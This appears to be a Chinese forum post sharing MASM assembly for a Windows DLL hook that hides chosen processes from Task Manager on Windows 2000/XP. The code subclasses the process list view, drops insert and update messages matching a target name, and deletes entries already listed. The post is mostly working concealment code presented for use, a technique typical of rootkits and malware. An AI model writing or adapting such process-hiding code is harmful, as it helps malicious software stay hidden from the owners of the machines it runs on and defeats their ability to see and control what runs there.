636
[原创]一个简单的windows HOOK - 隐藏进程管理器中特定的进程
(适用平台:windows 2000 sp4,windows XP sp2)
mov eax,_hinstance
mov hinstance,eax
.if _dwreason == DLL_PROCESS_ATTACH
.if cutme == 0
mov cutme,1
.else
invoke CreateThread,NULL,0,addr CTProcEx,0,0,/
addr tid
.endif
.elseif _dwreason == DLL_PROCESS_DETACH
.if oldLVProc == 0
jmp quit
.endif
invoke SetWindowLong,hlv,GWL_WNDPROC,/
oldLVProc
.endif
;*********************************************************************
NewLVProc proc uses esi edi ebx hwnd,umsg,wparam,lparam
local retbyte:dword
mov eax,umsg
.if eax == LVM_INSERTITEMW
assume esi:ptr LV_ITEM
mov esi,lparam
mov ebx,[esi].pszText
invoke WideCharToMultiByte,CP_ACP,0,/
ebx,-1,addr buf,/
sizeof buf,NULL,NULL
assume esi:nothing
invoke lstrcmp,addr buf,addr stxt
.if eax == 0
.else
invoke CallWindowProc,oldLVProc,/
hwnd,umsg,wparam,lparam
ret
.endif
.elseif eax == LVM_SETITEMW
assume esi:ptr LV_ITEM
mov esi,lparam
mov ebx,[esi].pszText
invoke WideCharToMultiByte,CP_ACP,0,/
ebx,-1,addr buf,/
sizeof buf,NULL,NULL
assume esi:nothing
invoke lstrcmp,addr buf,addr stxt
.if eax == 0
.else
invoke CallWindowProc,oldLVProc,/
hwnd,umsg,wparam,lparam
ret
.endif
.else
invoke CallWindowProc,oldLVProc,hwnd,umsg,/
wparam,lparam
ret
.endif
xor eax,eax
ret
NewLVProc endp
;*********************************************************************
CTProcEx proc uses esi edi ebx _pm
local ii:dword
local lvfi:LV_FINDINFO
mov lvfi.flags,LVFI_STRING
lea eax,stxt
mov lvfi.psz,eax
invoke SendMessage,hlv,LVM_FINDITEM,-1,addr lvfi
.if eax != 0ffffffffh
mov ii,eax
invoke SendMessage,hlv,LVM_DELETEITEM,ii,0
.endif
mov lvfi.flags,LVFI_STRING
lea eax,stxt2
mov lvfi.psz,eax
invoke SendMessage,hlv,LVM_FINDITEM,-1,addr lvfi
.if eax != 0ffffffffh
mov ii,eax
invoke SendMessage,hlv,LVM_DELETEITEM,ii,0
.endif
invoke SetWindowLong,hlv,GWL_WNDPROC,addr NewLVProc
mov oldLVProc,eax
quit:
ret
CTProcEx endp
;*********************************************************************
最后更新:2017-04-02 00:06:22